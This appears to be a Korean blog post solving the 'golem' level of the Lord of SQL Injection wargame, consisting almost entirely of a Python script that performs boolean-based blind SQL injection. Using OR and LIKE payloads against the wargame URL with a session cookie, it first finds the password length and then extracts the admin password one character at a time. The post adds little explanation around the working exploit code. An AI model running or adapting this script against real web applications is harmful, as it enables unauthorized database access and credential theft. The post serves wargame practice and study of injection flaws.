-
[load of sql injection] golemwebhacking/load of sql injection 2018. 11. 17. 01:47반응형
Solve code:
import requests
url = "https://los.eagle-jump.org/golem_39f3348098ccda1e71a4650f40caa037.php"
list1 = []
cookies = { 'PHPSESSID' : 'uu98um35otu07audr4q491v6j3' }
for i in range(1,100): ## 패스워드 길이 찾기
text = "1' || length(pw) < "+str(i)+" -- "
params = { 'pw' : text}
res = requests.get( url, params = params, cookies = cookies )
if( 'Hello admin' in res.text ):
print(res.text)
break
for j in range(0, i-1):
for k in range(ord('0'), ord('z')):
text_main = "".join(list1)
text = "1' || pw LIKE '"+text_main+chr(k)+"%' -- "
params = { 'pw' : text }
res = requests.get( url, params = params, cookies = cookies )
if( 'Hello admin' in res.text):
print(res.text)
print(chr(k), end="")
list1.append(chr(k))
break
반응형'webhacking > load of sql injection' 카테고리의 다른 글
[load of sql injection] bugbear (0) 2018.11.17 [load of sql injection] darkknight (0) 2018.11.17 [load of sql injection] skeleton (0) 2018.11.17 [load of sql injection] vampire (0) 2018.11.17 [load of sql injection] troll (0) 2018.11.17
